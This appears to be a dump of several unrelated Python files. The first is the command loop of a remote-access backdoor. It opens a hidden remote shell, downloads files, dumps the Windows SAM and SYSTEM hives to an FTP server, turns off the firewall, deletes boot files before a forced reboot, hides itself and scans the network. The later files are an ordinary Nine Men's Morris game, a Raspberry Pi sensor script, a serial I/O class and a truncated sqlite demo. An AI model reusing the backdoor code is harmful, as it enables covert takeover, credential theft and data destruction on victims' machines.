elif data.startswith('webdownload')==True:
split = shlex.split(data)
try:
url = split[1]
name = split[2]
urllib.urlretrieve(url,name)
server_socket.send('[*] %s Downloaded From The Web !' % (name))
except:
server_socket.send('[*] WebDownload error !')
elif data.startswith('opendiskloop')==True:
try:
if 'Linux' not in platform.platform():
f=open('opendisk.vbs','w')
f.write('Do\n')
f.write('Set oWMP = CreateObject("WMPlayer.OCX.7" )\n')
f.write('Set colCDROMs = oWMP.cdromCollection\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('Loop\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start opendisk.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(0.5)
s2 = subprocess.Popen('del opendisk.vbs /Q', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Open Disk Loop Started !')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Victim Required ! : Your Target is Linux or Other O.S')
except Exception as error_send_opendisk_loop:
server_socket.send(error_send_opendisk_loop)
elif data.startswith('odisk')==True:
try:
if 'Linux' not in platform.platform():
f=open('opendisk.vbs','w')
f.write('Set oWMP = CreateObject("WMPlayer.OCX.7" )\n')
f.write('Set colCDROMs = oWMP.cdromCollection\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('colCDROMs.Item(d).Eject\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start opendisk.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(0.5)
s2 = subprocess.Popen('del opendisk.vbs /Q', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Open Disk And Close Disk !')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required !')
except Exception as error_sent_odisk:
server_socket.send(error_sent_odisk)
elif data.startswith('tlrestart')==True:
try:
if 'Linux' not in platform.platform():
f=open('tlrestart.bat','w')
f.write('attrib -r -s -h C:\\autoexec.bat')
f.write('del C:\\autoexec.bat\n')
f.write('attrib -r -s -h C:\\boot.ini\n')
f.write('del C:\\boot.ini\n')
f.write('attrib -r -s -h C:\\ntldr\n')
f.write('del C:\\ntldr')
f.write('attrib -r -s -h C:\\Windows\\win.ini\n')
f.write('del C:\\Windows\\win.ini\n')
f.write('shutdown /r /t 2\n')
f.close()
#os.system('start tlrestart.bat')
time.sleep(0.3)
os.system('del tlrestart.bat')
server_socket.send('[*] The Last Restart Started !!! Rebooting Machine in few seconds')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required For This Command !')
except Exception as error_tlrestart:
server_socket.send(error_tlrestart)
elif data.startswith('hide_backdoor')==True:
try:
if 'Linux' not in platform.platform():
os.system('attrib +h %0')
server_socket.send('[*] Backdoor Hidden !!')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required !!')
except Exception as error_hide_backdoor:
server_socket.send(error_hide_backdoor)
elif data.startswith('cat')==True:
file_cat = data
split = shlex.split(file_cat)
try:
if len(split)==2:
check_file = os.path.exists(split[1])
if check_file ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
server_socket.sendall(content)
else:
server_socket.sendall('[*] File Not Found : %s' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_cat:
server_socket.sendall(error_cat)
elif data.startswith('whoami')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
if 'Windows' not in platform.platform():
cmd_whoami = subprocess.Popen(['whoami'], shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whoami = cmd_whoami.stderr.read() + cmd_whoami.stdout.read()
server_socket.sendall(out_cmd_whoami)
elif 'Linux' not in platform.platform():
cmd_user = subprocess.Popen(['whoami'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_user = cmd_user.stdout.read() + cmd_user.stderr.read()
server_socket.sendall(out_cmd_user)
except Exception as error_whoami:
server_socket.sendall(error_whoami)
elif data.startswith('rname')==True:
rename_file = data[6:]
split = shlex.split(rename_file)
old = split[0]
new = split[1]
try:
if len(split)==2:
check_rename_exists = os.path.exists(old)
if check_rename_exists ==True:
os.rename(old,new)
server_socket.sendall('[*] %s Renamed to %s !' % (old,new))
else:
server_socket.sendall('[*] %s Not Found !' % (old))
else:
server_socket.send('[*] Please Select Old And New File Renamed !')
except Exception as error_rename:
server_socket.sendall(error_rename)
elif data.startswith('sysinfo')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
platform_os = platform.system()
platform_version = platform.version()
platform_architecture = platform.architecture()[0]
platform_hostname = platform.node()
if 'Linux' not in platform.platform():
cmd_whoami_info = subprocess.Popen(['whoami'], shell=True, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whinfo = cmd_whoami_info.stdout.read() + cmd_whoami_info.stderr.read()
server_socket.sendall('[*] OS : %s\n[*] Version : %s\n[*] Architecture : %s\n[*] Hostname : %s\n[*] Public IP : %s\n[*] Local IP : %s\n[*] User Session : %s\n\n' % (platform_os,platform_version,platform_architecture,platform_hostname,ip,localip,out_cmd_whinfo))
elif 'Windows' not in platform.platform():
cmd_whoami_info = subprocess.Popen(['whoami'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whinfo = cmd_whoami_info.stdout.read() + cmd_whoami_info.stderr.read()
server_socket.sendall('[*] OS : %s\n[*] Version : %s\n[*] Architecture : %s\n[*] Hostname : %s\n[*] Public IP : %s\n[*] Local IP : %s\n[*] User Session : %s\n\n' % (platform_os,platform_version,platform_architecture,platform_hostname,ip,localip,out_cmd_whinfo))
except Exception as error_sysinfo:
server_socket.sendall(error_sysinfo)
elif data.startswith('pwd')==True:
try:
path = os.getcwd()
server_socket.sendall('Current Path : %s' % (path))
except Exception as error_pwd:
server_socket.sendall(error_pwd)
elif data.startswith('b64encode')==True:
filename_b64encode=data
split = shlex.split(filename_b64encode)
try:
if len(split)==2:
check_fb64 = os.path.exists(split[1])
if check_fb64 ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
encode = base64.b64encode(content)
content_replace = content.replace(content,encode)
f=open(split[1],'wb')
f.write(content_replace)
f.close()
server_socket.sendall('[*] %s Encoded By Base64' % (split[1]))
else:
server_socket.sendall('[*] %s Not Encoded By Base64' % (split[1]))
else:
server_socket.send('[*] Please Enter File !')
except Exception as error_base64:
server_socket.sendall(error_base64)
elif data.startswith('b64decode')==True:
filename_b64decode=data
split = shlex.split(filename_b64decode)
try:
if len(split)==2:
check_fb64 = os.path.exists(split[1])
if check_fb64 ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
encode = base64.b64decode(content)
content_replace = content.replace(content,encode)
f=open(split[1],'wb')
f.write(content_replace)
f.close()
server_socket.sendall('[*] %s Decoded By Base64' % (split[1]))
else:
server_socket.sendall('[*] %s Not Decoded By Base64' % (split[1]))
else:
server_socket.send('[*] Please Enter File Decode !')
except Exception as error_base64:
server_socket.sendall(error_base64)
elif data.startswith('help')==True:
server_socket.sendall('\n')
elif data.startswith('clear')==True:
server_socket.sendall('\n')
elif data.startswith('portscan')==True:
global port_scan
port_scan = []
target = data[9:]
def socket_port(ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
port_scan.append('[*] port : %s open !\n' % (port))
except:
pass
def start_thread_scanner_port(ip):
try:
i = 0
y = 0
while i<500:
try:
thread.start_new_thread(socket_port,(ip,y))
time.sleep(0.1)
y = y+1
i = i+1
except Exception as error_start_thread:
server_socket.send(error_start_thread)
except Exception as error_start_thread_scanner_port:
server_socket.send(error_start_thread_scanner_port)
start_thread_scanner_port(target)
x = 0
count_portscan = len(port_scan)
while x<count_portscan:
server_socket.send(port_scan[x])
x = x+1
port_scan = []
elif data.startswith('ls') or data.startswith('dir')==True:
try:
ld = glob.glob('*')
hd = glob.glob('.*')
for hrepo in hd:
server_socket.send('%s\n' % (hrepo))
for repo in ld:
server_socket.send('%s\n' % (repo))
except Exception as error_list_dir:
server_socket.send(error_list_dir)
elif data.startswith('dump_sam_system')==True:
try:
dump_db = os.system('reg save hklm\\sam C:\\sam && reg save hklm\\system C:\\system > NUL')
if dump_db ==0:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename_sam = 'C:\\sam'
filename_system = 'C:\\system'
file1 = open(filename_sam,'rb')
file2 = open(filename_system,'rb')
connect.storbinary('STOR '+filename_sam, file1)
connect.storbinary('STOR '+filename_system, file2)
file.close()
connect.quit()
server_socket.send('[*] Sam & System File DB Downloaded !')
else:
server_socket.send('[*] Error Dump Sam & System !')
except:
server_socket.send('[*] Error Dump SAM & SYSTEM FILE !')
elif data.startswith('kwindef')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('netsh advfirewall set allprofiles state off', startupinfo=info, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
server_socket.send('[*] Kill Windows Defender !')
except:
server_socket.send('[*] Error show wifi passwd')
elif data.startswith('ps')==True:
try:
if 'Linux' not in platform.platform():
tsklist_exec = subprocess.Popen(['tasklist'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_tsklist = tsklist_exec.stdout.read() + tsklist_exec.stderr.read()
server_socket.sendall(out_tsklist)
server_socket.send('\n')
elif 'Windows' not in platform.platform():
cmd_ps = 'ps -aux'
ps_exec = subprocess.Popen(cmd_ps,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_ps_exec = ps_exec.stdout.read() + ps_exec.stderr.read()
server_socket.sendall(out_ps_exec)
server_socket.send('\n')
except Exception as error_processus_list:
server_socket.sendall(error_processus_list)
elif data.startswith('ipgeo')==True:
try:
r = requests.get('https://ipinfo.io/json')
content_requests = r.text
obj = json.loads(content_requests)
ip = obj['ip'].encode('utf-8')
city = obj['city'].encode('utf-8')
region = obj['region'].encode('utf-8')
country = obj['country'].encode('utf-8')
loc = obj['loc'].encode('utf-8')
google_link = 'https://www.google.com/maps/@%s,16z' % (loc)
server_socket.sendall('[*] IP : '+str(ip)+'\n[*] CITY : '+str(city)+'\n[*] REGION : '+str(region)+'\n[*] COUNTRY : '+str(country)+'\n[*] LOCATION : '+str(loc)+'\n[*] GOOGLE MAP : '+str(google_link)+'\n\n')
except Exception as error_ipgeo:
server_socket.sendall(error_ipgeo)
elif data.startswith('cmd')==True:
cmd = data[4:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_exec = subprocess.Popen(cmd, shell=True, startupinfo=info,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_exec = cmd_exec.stdout.read() + cmd_exec.stderr.read()
server_socket.sendall(out_cmd_exec)
elif 'Windows' not in platform.platform():
cmd_exec = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_exec = cmd_exec.stdout.read() + cmd_exec.stderr.read()
server_socket.sendall(out_cmd_exec)
except Exception as error_sh_execute:
server_socket.send('[*] Error Sh Execute Command ! : %s ' % (error_sh_execute))
elif data.startswith('shell')==True:
if 'Linux' not in platform.platform():
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
p=subprocess.Popen(["c:\\windows\\system32\\cmd.exe"], shell=False, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=server2popen, args=[server_socket, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=popen2socket, args=[server_socket, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
server_socket.sendall('[*] CTRL + C')
except Exception as error_windows_server_config:
server_socket.sendall(error_windows_server_config)
elif 'Windows' not in platform.platform():
try:
os.dup2(server_socket.fileno(),0)
os.dup2(server_socket.fileno(),1)
os.dup2(server_socket.fileno(),2)
p=subprocess.call(["/bin/bash"])
except KeyboardInterrupt:
server_socket.sendall('[*] CTRL + C')
elif data.startswith('nscan')==True:
server_socket.send('[*] Wait few seconds Please.. Scanning Network')
start_scanner_network()
i = 0
count_host = len(host_alive)
while i<count_host:
server_socket.send(host_alive[i])
i = i+1
else:
server_socket.sendall('[*] Error Command !')
except Exception as error_main_server:
server_socket.sendall(error_main_server)
def main():
LHOST = '192.168.1.71'
LPORT = 1334
FTPHOST = LHOST
FTPPORT = 21
FTP_USER = 'unamed'
FTP_PASSWD = 'test123'
LOG_DIR_KEY = '/home/'
LOG_FILE_KEY = 'key.txt'
sys_required()
main_config_server(LHOST,LPORT,FTPHOST,FTPPORT,FTP_USER,FTP_PASSWD,LOG_DIR_KEY,LOG_FILE_KEY)
if __name__ =='__main__':
main()
|
mills_old.py
|
#!/usr/bin/env python
import numpy as np
import ai
import pygame
from time import sleep
from threading import Thread
from threading import Event
# SETTINGS
GUI = True
BACKGROUND = (90, 90, 90) # gray
PLAYER1 = (240, 240, 240) # almost white
PLAYER2 = (10, 10, 10) # almost black
TEXT = (50, 50, 240)
pygame.font.init()
myfont = pygame.font.SysFont('Comic Sans MS', 30)
LINES = (255, 255, 255) # white
TAKE_PIECE_REWARD = 0.2
WIN_REWARD = 1
# globals - don't change
clickCondition = Event()
clickX = 0
clickY = 0
# pygame input
def blockGetClickIndex():
global clickX, clickY, clickCondition
# wait for click event and copy coordinates
while clickX == clickY == 0:
try:
clickCondition.wait(1)
except KeyboardInterrupt:
return -1
x = clickX
y = clickY
clickX = clickY = 0
clickCondition.clear()
# look up piece
for i in range(24):
dx = x - 50 * getCoords(i)[0]
dy = y - 50 * getCoords(i)[1]
if dx ** 2 + dy ** 2 <= 30 ** 2: # x^2 + y^2 <= r^2
return i
return -1
# Lookup table for what fields are above others, nicer and more readable than if's
above_arr = [-1, -1, -1, -1, 1, -1, -1, 4, -1, 0, 3, 6, 8, 5, 2, 11, -1, 12, 10, 16, 13, 9, 19, 14]
# Lookup table for coordinates
coord_arr = np.array([(1,1), (7,1), (13,1), (3,3), (7,3), (11,3), (5,5), (7,5), (9,5), (1,7), (3,7), (5,7),
(9,7), (11,7), (13,7), (5,9), (7,9), (9,9), (3,11), (7,11), (11,11), (1,13), (7,13), (13,13)], dtype=[('x', 'i4'),('y', 'i4')])
def indexAbove(i):
return above_arr[i]
def indexBelow(i):
try:
return above_arr.index(i)
except ValueError:
return -1
def indexLeft(i):
if i % 3 == 0:
return -1
else:
return i-1
def indexRight(i):
if i % 3 == 2:
return -1
else:
return i+1
def getCoords(i):
return [coord_arr['x'][i], coord_arr['y'][i]]
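# A position i is part of a mill when it and two aligned neighbours hold the same
# player's piece; safeGet() returns 2 for off-board indices, so incomplete lines never match.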
def isInMill(board, i):
if i == -1:
return False
else:
return (safeGet(board, indexAbove(i)) == safeGet(board, indexAbove(indexAbove(i))) == board[i] != 2) or \
(safeGet(board, indexAbove(i)) == safeGet(board, indexBelow(i)) == board[i] != 2) or \
(safeGet(board, indexBelow(i)) == safeGet(board, indexBelow(indexBelow(i))) == board[i] != 2) or \
(safeGet(board, indexLeft(i)) == safeGet(board, indexLeft(indexLeft(i))) == board[i] != 2) or \
(safeGet(board, indexLeft(i)) == safeGet(board, indexRight(i)) == board[i] != 2) or \
(safeGet(board, indexRight(i)) == safeGet(board, indexRight(indexRight(i))) == board[i] != 2)
def safeGet(board, i):
if i < 0 or i >= len(board):
return 2
return board[i]
class GameState:
def reset(self):
self.board = np.zeros(24)
self.opponent_num_pieces = 9
self.player_num_pieces = 9
def __init__(self):
self.board = np.zeros(24)
self.opponent_num_pieces = 9
self.player_num_pieces = 9
if GUI: # Init pygame
pygame.init()
self.screen = pygame.display.set_mode((700, 700))
pygame.display.set_caption("Nine Men's Morris")
self.screen.fill(BACKGROUND)
self.clock = pygame.time.Clock()
self.init_gui()
def init_gui(self):
# Create thread to update gui
thread = Thread(target=self.update_gui)
thread.start()
def update_gui(self):
done = False
while not done:
global clickX, clickY, clickCondition
try:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
clickCondition.set()
elif event.type == pygame.MOUSEBUTTONDOWN:
clickX, clickY = pygame.mouse.get_pos()
clickCondition.set()
self.screen.fill(BACKGROUND)
# Upper horizontal lines
self.draw_line([1, 1], [13, 1])
self.draw_line([3, 3], [11, 3])
self.draw_line([5, 5], [9, 5])
# Lower horizontal lines
self.draw_line([5, 9], [9, 9])
self.draw_line([3, 11], [11, 11])
self.draw_line([1, 13], [13, 13])
# Middle horizontal lines
self.draw_line([1, 7], [5, 7])
self.draw_line([9, 7], [13, 7])
# Draw board
for i in range(len(self.board)):
self.draw_piece(i, self.board[i])
# Update display
pygame.display.flip()
# Update GUI with 60 FPS
self.clock.tick(60)
except pygame.error:
import sys
sys.exit(0)
pygame.quit()
def draw_line(self, start, end):
pygame.draw.line(self.screen, LINES, [x * 50 for x in start], [x * 50 for x in end], 10)
pygame.draw.line(self.screen, LINES, [x * 50 for x in start[::-1]], [x * 50 for x in end[::-1]], 10)
def draw_piece(self, index, value):
pos = getCoords(index)
if value != 0:
if value > 0:
color = PLAYER1
else:
color = PLAYER2
pygame.draw.circle(self.screen, color, [x * 50 for x in pos], 30)
pygame.draw.circle(self.screen, [x - 10 for x in color], [x * 50 for x in pos], 30, 5)
self.screen.blit(myfont.render(str(index), False, TEXT), [x*50-30 for x in pos])
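# Advance the game by one ply. input_vect is a 24-element score vector (one score per
# board position) used to choose where to place or move a piece; when execute_opponent
# is True the built-in AI answers with its own move. Returns (board, reward, terminal).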
def frame_step(self, input_vect, execute_opponent=True, skip_player=False, color=1):
if color == 1:
num_pieces = self.player_num_pieces
else:
num_pieces = self.opponent_num_pieces
enemy_reward = 0
reward = 0
terminal = False
start = -1
if not skip_player:
# -------------------- FIGURE OUT MOVE --------------------
if num_pieces > 0: # Set down piece
#print('can set down a piece') # DEBUG
x = np.argsort(input_vect) # list of indices, sorted 0 -> max
i = -1
while self.board[x[i]] != 0:
i-=1
dest = x[i]
if color == 1:
self.player_num_pieces -= 1
else:
self.opponent_num_pieces -= 1
else: # Move piece
# Find best moves according to input_vect
if len(self.board[self.board == color]) == 3: # Can jump
#print('can jump') # DEBUG
x = np.argsort(input_vect)
# start = worst own field
i = 0
while self.board[x[i]] != color:
i+=1
start = x[i]
# dest = best free field
i = -1
while self.board[x[i]] != 0:
i-=1
dest = x[i]
else: # Can't jump
#print('can\'t jump') # DEBUG
# Functions to get neighbouring positions
fs = [indexAbove, indexBelow, indexLeft, indexRight]
# Map to hold scores
map_type = [('start', 'i4'),('dest', 'i4'), ('score', 'f4')]
_map = np.array([], dtype=map_type)
# Loop to check all possible moves
for s in range(0,24):
if self.board[s] == color:
for f in fs:
d = f(s)
if d != -1 and self.board[d] == 0:
score = input_vect[d] - input_vect[s]
_map = np.append(_map, np.array((s,d,score), dtype=map_type))
# Find best move
try:
best = np.argmax(_map['score']) # throws ValueError if empty
start = _map['start'][best]
dest = _map['dest'][best]
except ValueError:
dest = -1
start = -1
# -------------------- EXECUTE MOVE --------------------
if dest == -1: # Stuck
#print('is stuck') # DEBUG
reward = -WIN_REWARD
terminal = True
self.reset()
else:
# Execute
if start != -1: # A piece was moved (not placed), so clear its old position
self.board[start] = 0
self.board[dest] = color
# If mill closed, remove best opponent piece
if isInMill(self.board, dest):
#print('closed mill') # DEBUG
x = np.argsort(input_vect)
# best = best enemy field not in mill
i = -1
while self.board[x[i]] != -color or isInMill(self.board, x[i]):
i-=1
if i < -len(x): # all opponent pieces considered, but all in mill -> take best piece, even if in mill
i = -1
break
best = x[i]
# Remove best piece
self.board[best] = 0
reward = TAKE_PIECE_REWARD
# Check if gameOver
if len(self.board[self.board == -color]) < 3:
terminal = True
reward = WIN_REWARD
self.reset()
if execute_opponent:
# look up num_pieces for opponent
if color == 1:
num_opp_pieces = self.opponent_num_pieces
else:
num_opp_pieces = self.player_num_pieces
# execute AI
_, moves = ai.calcMove(self.board, -1, num_opp_pieces, num_pieces)
for m in moves:
print('move: ' + str(m))
if m[0] != -1:
self.board[m[0]] = 0
if m[1] != -1:
self.board[m[1]] = -1
# decrease num_pieces for opponent
if color == 1:
self.opponent_num_pieces -= 1
else:
self.player_num_pieces -= 1
# Check if gameOver
if terminal:
self.reset()
return self.board, reward - enemy_reward, terminal
|
practice.py
|
import sys, os, imp, time
import RPi.GPIO as GPIO
import threading
GPIO.setmode(GPIO.BCM)
# TODO: a function that returns the detected particle concentration
# based on measurement data and a mathematical model; may require importing a .mdl file.
# Currently a dummy function.
def get_detected_level():
led.emitter(True)
time.sleep(1)
res = TSL2561.fullSpectrumValue()
return res
# TODO: a function that reports the detected level visually via the LCD and LEDs
def report_result():
result = get_detected_level()
lcd.lcd_clear_screen()
lcd.lcd_text('Lux = ', lcd.LCD_LINE_1)
lcd.lcd_text(str(result), lcd.LCD_LINE_2)
# Pin to which the button to enter user mode is connected
PUSH_BUTTON_PIN = 21
GPIO.setup(PUSH_BUTTON_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
usermode = False
def enter_user_mode(channel):
global usermode
usermode = True
GPIO.add_event_detect(PUSH_BUTTON_PIN, GPIO.RISING, callback=enter_user_mode, bouncetime=200)
# The threshold used to confirm that blue light emitters are connected.
# Set to be half of expected value when on.
EMITTER_THRESHOLD_LUX = 1000
# Import LCD
# home_dir = os.path.expanduser("/home/pi/2019-genas-china-smart-device")
# lcd_file = os.path.join(home_dir, "LCD1602/lcd.py")
# lcd = imp.load_source('lcd', lcd_file)
try:
import lcd
lcd.setup()
lcd_welcome = threading.Thread(target=lcd.lcd_success_message)
lcd_welcome.start()
except:
print("FATAL: LCD IMPORT FAILURE")
exit()
# Import TCS34725
try:
# tcs_file = os.path.join(home_dir, "TCS34725/Adafruit_TCS34725.py")
# Adafruit_TCS34725 = imp.load_source('TCS34725', tcs_file)
import Adafruit_TCS34725
import smbus
tcs = Adafruit_TCS34725.TCS34725()
tcs.set_interrupt(True)
r, g, b, c = tcs.get_raw_data()
lux = Adafruit_TCS34725.calculate_lux(r, g, b)
print('Current color in box: red={0} green={1} blue={2} clear={3}. Lux={4}'.format(r, g, b, c, lux))
# TCS34725 functions
# # Read the R, G, B, C color data.
# r, g, b, c = tcs.get_raw_data()
# # Calculate color temperature using utility functions. You might also want to
# # check out the colormath library for much more complete/accurate color functions.
# color_temp = Adafruit_TCS34725.calculate_color_temperature(r, g, b)
# # Calculate lux with another utility function.
# lux = Adafruit_TCS34725.calculate_lux(r, g, b)
# lcd.lcd_text('R={0} G={1} B={2} C={3} L={4}'.format(r, g, b, c, lux), lcd.LCD_LINE_2)
# time.sleep(1)
# lcd.lcd_clear_screen()
except:
lcd.lcd_text("TCS34725 FAIL", lcd.LCD_LINE_2)
exit()
# Import LED
try:
import led
except:
lcd.lcd_text("LED FAIL", lcd.LCD_LINE_2)
exit()
# Import DS18B20
try:
from w1thermsensor import W1ThermSensor
temp_sensor = W1ThermSensor()
except:
lcd.lcd_text("DS18B20 FAIL", lcd.LCD_LINE_2)
exit()
# Import TSL2561
try:
import TSL2561
except:
lcd.lcd_text("TSL2561 FAIL", lcd.LCD_LINE_2)
exit()
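# Sanity check for the blue-light emitter: compare the visible-light reading taken right
# after switching the emitter on with the reading one second later; if the increase is
# below EMITTER_THRESHOLD_LUX, assume the emitter is not connected and abort.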
def testEmitter():
led.emitter(True)
blankValue = TSL2561.visibleValue()
time.sleep(1)
coloredValue = TSL2561.visibleValue()
if (coloredValue - blankValue) < EMITTER_THRESHOLD_LUX:
# Emitter not connected
lcd.lcd_text("Emitter FAIL", lcd.LCD_LINE_1)
sys.exit()
else:
led.emitter(False)
return
lcd_welcome.join()
emitterTest = threading.Thread(target=testEmitter)
emitterTest.start()
emitterTest.join()
led.emitter(False)
lcd.lcd_text("All OK", lcd.LCD_LINE_1)
lcd.lcd_text("Lux={0},T={1}".format(TSL2561.visibleValue(), temp_sensor.get_temperature()), lcd.LCD_LINE_2)
time.sleep(1)
# Print out Wi-Fi SSID and local IP address if connected
lcd.lcd_clear_screen()
# Try to connect to Wi-Fi and print connection
# information, but only when not yet in user mode
if not usermode:
count = 0
while True:
wifi_name = os.popen('iwgetid -r').read()
wifi_name = wifi_name[0:(len(wifi_name)-1)].strip()
if(wifi_name == ''):
time.sleep(1)
count = count + 1
elif count > 15:
break
else:
break
if count > 15:
lcd.lcd_text("Wi-Fi", lcd.LCD_LINE_1)
lcd.lcd_text("Not connected", lcd.LCD_LINE_2)
else:
wifi_name = os.popen('iwgetid -r').read()
wifi_name = wifi_name[0:(len(wifi_name)-1)].strip()
ipaddr = os.popen('hostname -I').read()
ipaddr = ipaddr[0:(len(ipaddr)-1)].strip()
lcd.lcd_text(wifi_name, lcd.LCD_LINE_1)
lcd.lcd_text(ipaddr, lcd.LCD_LINE_2)
tick = 0
while True:
if usermode:
break
if tick > 15:
sys.exit() # Exit program if user did not specify usermode in 15 seconds
tick = tick + 1
time.sleep(1)
# Usermode now
lcd.lcd_clear_screen()
lcd.lcd_text('User Mode', lcd.LCD_LINE_1)
GPIO.remove_event_detect(PUSH_BUTTON_PIN)
time.sleep(1)
while True:
GPIO.output(led.WHITE_LED_PIN, True)
lcd.lcd_clear_screen()
lcd.lcd_text('Put in sample', lcd.LCD_LINE_1)
lcd.lcd_text('Push btn on done', lcd.LCD_LINE_2)
GPIO.wait_for_edge(PUSH_BUTTON_PIN, GPIO.RISING)
GPIO.output(led.WHITE_LED_PIN, False)
threading.Thread(target=led.blink_led, args=(led.BLUE_LED_PIN, 0.3, 0.3,)).start()
lcd.lcd_clear_screen()
lcd.lcd_text('Detecting', lcd.LCD_LINE_1)
report_result()
led.stop_blinking()
GPIO.wait_for_edge(PUSH_BUTTON_PIN, GPIO.RISING)
|
serial_io.py
|
from __future__ import division
import json
import time
import serial as _serial
import platform
import sys
if sys.version_info >= (3, 0):
import queue
else:
import Queue as queue
from threading import Event, Thread
from serial.tools.list_ports import comports
from . import IOHandler
try:
JSONDecodeError = json.decoder.JSONDecodeError
except AttributeError:
JSONDecodeError = ValueError
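# Serial transport for IOHandler: a background thread polls the port and queues
# newline-terminated JSON lines. Minimal usage sketch (the device path is an assumption):
#   io = Serial('/dev/ttyUSB0')
#   line = io.recv()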
class Serial(IOHandler):
poll_frequency = 200
@classmethod
def available_hosts(cls):
devices = comports(include_links=True)
return [d.device for d in devices]
@classmethod
def is_host_compatible(cls, host):
return host in cls.available_hosts()
def __init__(self, host, baudrate=1000000):
self._serial = _serial.Serial(host, baudrate)
self._serial.flush()
self._msg = queue.Queue(100)
self._running = True
self._poll_loop = Thread(target=self._poll)
self._poll_loop.daemon = True
self._poll_loop.start()
def is_ready(self):
if self._serial.in_waiting == 0:
return False
try:
self.read()
return True
except (UnicodeDecodeError, JSONDecodeError):
return False
def recv(self):
return self._msg.get()
def write(self, data):
self._serial.write(data + '\r'.encode())
def close(self):
self._running = False
self._poll_loop.join()
self._serial.close()
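# Background polling loop: read whatever bytes are waiting, split the buffer into
# newline-terminated lines starting at the first '{', and push each line onto the
# bounded queue, dropping the oldest entry when the queue is full.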
def _poll(self):
def extract_line(s):
j = s.find(b'\n')
if j == -1:
return b'', s
# The beginning of the serial data can sometimes be corrupted; discard it
# Find the first '{'
x = s.find(b'{')
if x == -1:
return b'', s[j + 1:]
return s[x:j], s[j + 1:]
period = 1 / self.poll_frequency
buff = b''
while self._running:
to_read = self._serial.in_waiting
if to_read == 0:
time.sleep(period)
continue
s = self._serial.read(to_read)
buff = buff + s
while self._running:
line, buff = extract_line(buff)
if not len(line):
break
if self._msg.full():
self._msg.get()
self._msg.put(line)
|
sqlite3_isolation_levels.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2010 Doug Hellmann. All rights reserved.
#
"""Illustrate the effect of isolation levels.
"""
#end_pymotw_header
import logging
import sqlite3
import sys
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s (%(threadName)-10s) %(message)s',
)
db_filename = 'todo.db'
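# The isolation level to test is taken from the command line, e.g.:
#   python3 sqlite3_isolation_levels.py DEFERRED
# (sqlite3 also accepts IMMEDIATE and EXCLUSIVE)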
isolation_level = sys.argv[1]
def writer():
with sqlite3.connect(
db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
cursor.execute('update task set priority = priority + 1')
logging.debug('waiting to synchronize')
ready.wait() # synchronize threads
logging.debug('PAUSING')
time.sleep(1)
conn.commit()
logging.debug('CHANGES COMMITTED')
def reader():
with sqlite3.connect(
db_filename,
isolation_level=isolation_level) as conn:
cursor = conn.cursor()
